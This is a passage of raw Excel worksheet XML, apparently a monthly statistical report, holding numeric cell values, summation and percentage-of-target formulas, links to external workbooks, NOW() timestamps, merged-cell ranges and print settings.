      <c r="Z95" s="358"/>
    </row>
    <row r="96" spans="1:26">
      <c r="T96" s="235" t="s">
        <v>288</v>
      </c>
      <c r="U96" s="359">
        <f ca="1">NOW()</f>
        <v>46062.7495486111</v>
      </c>
      <c r="V96" s="359"/>
      <c r="W96" s="360">
        <f ca="1">NOW()</f>
        <v>46062.7495486111</v>
      </c>
    </row>
    <row r="97" spans="19:25">
      <c r="S97" s="172"/>
      <c r="T97" s="172"/>
      <c r="U97" s="172"/>
      <c r="V97" s="172"/>
      <c r="W97" s="172"/>
      <c r="X97" s="172"/>
      <c r="Y97" s="172"/>
    </row>
    <row r="157"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P26:Q26"/>
    <mergeCell ref="B27:D27"/>
    <mergeCell ref="P27:Q27"/>
    <mergeCell ref="C28:D28"/>
    <mergeCell ref="P28:Q28"/>
    <mergeCell ref="C29:D29"/>
    <mergeCell ref="P29:Q29"/>
    <mergeCell ref="B30:D30"/>
    <mergeCell ref="P30:Q30"/>
    <mergeCell ref="B31:D31"/>
    <mergeCell ref="P31:Q31"/>
    <mergeCell ref="P32:Q32"/>
    <mergeCell ref="B36:D36"/>
    <mergeCell ref="B37:D37"/>
    <mergeCell ref="C38:D38"/>
    <mergeCell ref="P38:Q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6:D66"/>
    <mergeCell ref="B67:D67"/>
    <mergeCell ref="C68:D68"/>
    <mergeCell ref="C69:D69"/>
    <mergeCell ref="B70:D70"/>
    <mergeCell ref="B71:D71"/>
    <mergeCell ref="B74:D74"/>
    <mergeCell ref="B75:D75"/>
    <mergeCell ref="C76:D76"/>
    <mergeCell ref="C77:D77"/>
    <mergeCell ref="B78:D78"/>
    <mergeCell ref="B81:D81"/>
    <mergeCell ref="B82:D82"/>
    <mergeCell ref="C83:D83"/>
    <mergeCell ref="C84:D84"/>
    <mergeCell ref="B85:D85"/>
    <mergeCell ref="B88:D88"/>
    <mergeCell ref="B89:D89"/>
    <mergeCell ref="C90:D90"/>
    <mergeCell ref="C91:D91"/>
    <mergeCell ref="B92:D92"/>
    <mergeCell ref="B93:D93"/>
    <mergeCell ref="C94:D94"/>
    <mergeCell ref="C95:D95"/>
    <mergeCell ref="U96:V96"/>
    <mergeCell ref="A5:A20"/>
    <mergeCell ref="A21:A30"/>
    <mergeCell ref="A31:A40"/>
    <mergeCell ref="A41:A50"/>
    <mergeCell ref="A51:A60"/>
    <mergeCell ref="A61:A70"/>
    <mergeCell ref="A71:A77"/>
    <mergeCell ref="A78:A84"/>
    <mergeCell ref="A85:A91"/>
    <mergeCell ref="A92:A95"/>
    <mergeCell ref="B6:B11"/>
    <mergeCell ref="B12:B15"/>
    <mergeCell ref="B18:B19"/>
    <mergeCell ref="B22:B25"/>
    <mergeCell ref="B28:B29"/>
    <mergeCell ref="B32:B35"/>
    <mergeCell ref="B38:B39"/>
    <mergeCell ref="B42:B45"/>
    <mergeCell ref="B48:B49"/>
    <mergeCell ref="B52:B55"/>
    <mergeCell ref="B58:B59"/>
    <mergeCell ref="B62:B65"/>
    <mergeCell ref="B68:B69"/>
    <mergeCell ref="B76:B77"/>
    <mergeCell ref="B83:B84"/>
    <mergeCell ref="B90:B91"/>
    <mergeCell ref="B94:B95"/>
    <mergeCell ref="C12:C13"/>
    <mergeCell ref="C14:C15"/>
    <mergeCell ref="C22:C23"/>
    <mergeCell ref="C24:C25"/>
    <mergeCell ref="C32:C33"/>
    <mergeCell ref="C34:C35"/>
    <mergeCell ref="C42:C43"/>
    <mergeCell ref="C44:C45"/>
    <mergeCell ref="C52:C53"/>
    <mergeCell ref="C54:C55"/>
    <mergeCell ref="C62:C63"/>
    <mergeCell ref="C64:C65"/>
    <mergeCell ref="E3:E4"/>
    <mergeCell ref="F3:F4"/>
    <mergeCell ref="G3:G4"/>
    <mergeCell ref="H3:H4"/>
    <mergeCell ref="I3:I4"/>
    <mergeCell ref="J3:J4"/>
    <mergeCell ref="K3:K4"/>
    <mergeCell ref="L3:L4"/>
    <mergeCell ref="M3:M4"/>
    <mergeCell ref="N3:N4"/>
    <mergeCell ref="O5:O24"/>
    <mergeCell ref="O26:O31"/>
    <mergeCell ref="O32:O36"/>
    <mergeCell ref="O37:O56"/>
    <mergeCell ref="O57:O83"/>
    <mergeCell ref="O84:O95"/>
    <mergeCell ref="P5:P8"/>
    <mergeCell ref="P9:P11"/>
    <mergeCell ref="P12:P14"/>
    <mergeCell ref="P15:P16"/>
    <mergeCell ref="P17:P21"/>
    <mergeCell ref="P22:P23"/>
    <mergeCell ref="P39:P42"/>
    <mergeCell ref="P43:P47"/>
    <mergeCell ref="P48:P51"/>
    <mergeCell ref="P52:P54"/>
    <mergeCell ref="P55:P58"/>
    <mergeCell ref="P62:P63"/>
    <mergeCell ref="P64:P66"/>
    <mergeCell ref="P67:P69"/>
    <mergeCell ref="P70:P72"/>
    <mergeCell ref="P73:P75"/>
    <mergeCell ref="P76:P78"/>
    <mergeCell ref="P79:P81"/>
    <mergeCell ref="P82:P84"/>
    <mergeCell ref="P85:P87"/>
    <mergeCell ref="P88:Z95"/>
    <mergeCell ref="B86:C87"/>
    <mergeCell ref="B79:C80"/>
    <mergeCell ref="B72:C73"/>
    <mergeCell ref="O3:Q4"/>
    <mergeCell ref="A3:D4"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.2" right="0.2" top="0.2" bottom="0.2" header="0" footer="0"/>
  <pageSetup paperSize="9" scale="55"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9.87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1/31</f>
        <v>0.032258064516129</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>45992</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16526.84</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'r'!H5</f>
        <v>16526.84</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6171392.87</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>22586.48</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'r'!K5</f>
        <v>22586.48</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6172657.611</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>261561.994</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>69.9363620320855</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]1'!$W$101</f>
        <v>273.583333333333</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]1'!$X$101</f>
        <v>273.583333333333</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]1'!$Y$101</f>
        <v>259.999819484844</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]1'!$T$101</f>
        <v>100</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]1'!$U$101</f>
        <v>100</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]1'!$V$101</f>
        <v>64.7676492537313</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]1'!$Q$101</f>
        <v>24</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]1'!$R$101</f>
        <v>24</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]1'!$S$101</f>
        <v>5207.319</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]1'!$D$23+'[11]1'!$D$17+'[12]1'!$D$17+'[13]1'!$D$25+'[14]1'!$D$8+'[14]1'!$D$15+'[15]1'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]1'!$E$23+'[11]1'!$E$17+'[12]1'!$E$17+'[13]1'!$E$25+'[14]1'!$E$8+'[14]1'!$E$15+'[15]1'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'r'!H6</f>
        <v>0</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>276349.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]1'!$I$23+'[11]1'!$I$17+'[12]1'!$I$17+'[13]1'!$I$25+'[14]1'!$E$23+'[14]1'!$E$30+'[15]1'!$H$7</f>
        <v>867.58</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'r'!K6</f>
        <v>867.58</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>263065.28</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]1'!$L$23+'[11]1'!$L$17+'[12]1'!$L$17+'[13]1'!$L$25+'[14]1'!$H$23+'[14]1'!$H$30+'[15]1'!$K$7</f>
        <v>31245.26</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]1'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]1'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]1'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]1'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]1'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]1'!$V$102</f>
        <v>35.3880472636816</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]1'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]1'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]1'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]1'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]1'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'r'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]1'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'r'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]1'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]1'!$W$107</f>
        <v>128</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]1'!$X$107</f>
        <v>128</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]1'!$Y$107</f>
        <v>131.915541610063</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]1'!$T$107</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]1'!$U$107</f>
        <v>41.6666666666667</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]1'!$V$107</f>
        <v>31.0376865671641</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]1'!$Q$107</f>
        <v>10</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]1'!$R$107</f>
        <v>10</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]1'!$S$107</f>
        <v>2495.43</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]1'!$D$27+'[11]1'!$D$18+'[13]1'!$D$26+'[14]1'!$D$10+'[14]1'!$D$17+'[15]1'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]1'!$E$27+'[11]1'!$E$18+'[13]1'!$E$26+'[14]1'!$E$10+'[14]1'!$E$17+'[15]1'!$E$9</f>
        <v>1999</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'r'!H8</f>
        <v>1999</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>527535.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]1'!$I$27+'[11]1'!$I$18+'[13]1'!$I$26+'[14]1'!$E$25+'[14]1'!$E$32+'[15]1'!$H$9</f>
        <v>2353.67</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'r'!K8</f>
        <v>2353.67</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>510098.38</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]1'!$L$27+'[11]1'!$L$18+'[13]1'!$L$26+'[14]1'!$H$25+'[14]1'!$H$32+'[15]1'!$K$9</f>
        <v>41525.23</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]1'!$W$108</f>
        <v>129.4</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]1'!$X$108</f>
        <v>129.4</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]1'!$Y$108</f>
        <v>127.43321929447</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]1'!$T$108</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]1'!$U$108</f>
        <v>41.6666666666667</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]1'!$V$108</f>
        <v>27.4483830845771</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]1'!$Q$108</f>
        <v>10</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]1'!$R$108</f>
        <v>10</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]1'!$S$108</f>
        <v>2206.85</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]1'!$D$24+'[11]1'!$D$19+'[12]1'!$D$20+'[13]1'!$D$27+'[14]1'!$D$11+'[14]1'!$D$18+'[15]1'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]1'!$E$24+'[11]1'!$E$19+'[12]1'!$E$20+'[13]1'!$E$27+'[14]1'!$E$11+'[14]1'!$E$18+'[15]1'!$E$10</f>
        <v>11619</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'r'!H9</f>
        <v>11619</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4147007.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]1'!$I$24+'[11]1'!$I$19+'[12]1'!$I$20+'[13]1'!$I$27+'[14]1'!$E$26+'[14]1'!$E$33+'[15]1'!$H$10</f>
        <v>14642.03</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'r'!K9</f>
        <v>14642.03</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4112120.841</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]1'!$L$24+'[11]1'!$L$19+'[12]1'!$L$20+'[13]1'!$L$27+'[14]1'!$H$26+'[14]1'!$H$33+'[15]1'!$K$10</f>
        <v>107842.682</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]1'!$W$109</f>
        <v>257.027752909579</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]1'!$X$109</f>
        <v>257.027752909579</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]1'!$Y$109</f>
        <v>271.256181504654</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]1'!$T$109</f>
        <v>46.5416666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]1'!$U$109</f>
        <v>46.5416666666667</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]1'!$V$109</f>
        <v>34.9099502487562</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]1'!$Q$109</f>
        <v>11.17</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]1'!$R$109</f>
        <v>11.17</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]1'!$S$109</f>
        <v>2806.76</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]1'!$D$25+'[11]1'!$D$20+'[12]1'!$D$21+'[13]1'!$D$28+'[14]1'!$D$12+'[14]1'!$D$19+'[15]1'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]1'!$E$25+'[11]1'!$E$20+'[12]1'!$E$21+'[13]1'!$E$28+'[14]1'!$E$12+'[14]1'!$E$19+'[15]1'!$E$11</f>
        <v>1220</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'r'!H10</f>
        <v>1220</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>918747.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]1'!$I$25+'[11]1'!$I$20+'[12]1'!$I$21+'[13]1'!$I$28+'[14]1'!$E$27+'[14]1'!$E$34+'[15]1'!$H$11</f>
        <v>3341</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'r'!K10</f>
        <v>3341</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>900569.72</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]1'!$L$25+'[11]1'!$L$20+'[12]1'!$L$21+'[13]1'!$L$28+'[14]1'!$H$27+'[14]1'!$H$34+'[15]1'!$K$11</f>
        <v>59085.942</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]1'!$W$110</f>
        <v>0</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]1'!$X$110</f>
        <v>0</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]1'!$Y$110</f>
        <v>268.850893251232</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]1'!$T$110</f>
        <v>0</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]1'!$U$110</f>
        <v>0</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]1'!$V$110</f>
        <v>34.378855721393</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]1'!$Q$110</f>
        <v>0</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]1'!$R$110</f>
        <v>0</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]1'!$S$110</f>
        <v>2764.06</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]1'!$D$26+'[11]1'!$D$21+'[12]1'!$D$19+'[13]1'!$D$29+'[14]1'!$D$13+'[14]1'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]1'!$E$26+'[11]1'!$E$21+'[12]1'!$E$19+'[13]1'!$E$29+'[14]1'!$E$13+'[14]1'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'r'!H11</f>
        <v>0</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>0</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]1'!$I$26+'[11]1'!$I$21+'[12]1'!$I$19+'[13]1'!$I$29+'[14]1'!$E$28+'[14]1'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'r'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]1'!$L$26+'[11]1'!$L$21+'[12]1'!$L$19+'[13]1'!$L$29+'[14]1'!$H$28+'[14]1'!$H$35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8314.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'r'!H12</f>
        <v>8314.00000000002</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>4950705.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>14841.468</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'r'!K12</f>
        <v>14841.468</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5043947.844</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>367178.23700005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>83.6396895216515</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]1'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]1'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]1'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]1'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]1'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]1'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]1'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]1'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]1'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'r'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'r'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>67.3721535779909</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]1'!$W$68</f>
        <v>277.460317460317</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]1'!$X$68</f>
        <v>277.460317460317</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]1'!$Y$68</f>
        <v>266.394337693732</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]1'!$T$68</f>
        <v>26.25</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]1'!$U$68</f>
        <v>26.25</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]1'!$V$68</f>
        <v>71.4157960199005</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]1'!$Q$68</f>
        <v>6.30</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]1'!$R$68</f>
        <v>6.30</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]1'!$S$68</f>
        <v>5741.83</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>0</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'r'!H14</f>
        <v>0</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>964543.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>5189.246</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'r'!K14</f>
        <v>5189.246</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1798133.352</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>67564.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]1'!$W$71</f>
        <v>200.375</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]1'!$X$71</f>
        <v>200.375</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]1'!$Y$71</f>
        <v>213.474470194572</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]1'!$T$71</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]1'!$U$71</f>
        <v>33.3333333333333</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]1'!$V$71</f>
        <v>50.1803482587065</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]1'!$Q$71</f>
        <v>8.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]1'!$R$71</f>
        <v>8.00</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]1'!$S$71</f>
        <v>4034.50</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'r'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>473.78</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'r'!K15</f>
        <v>473.78</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>115230.28</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]1'!$W$72</f>
        <v>62.375</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]1'!$X$72</f>
        <v>62.375</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]1'!$Y$72</f>
        <v>61.2863976450386</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]1'!$T$72</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]1'!$U$72</f>
        <v>33.3333333333333</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]1'!$V$72</f>
        <v>50.702736318408</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]1'!$Q$72</f>
        <v>8.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]1'!$R$72</f>
        <v>8.00</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]1'!$S$72</f>
        <v>4076.50</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
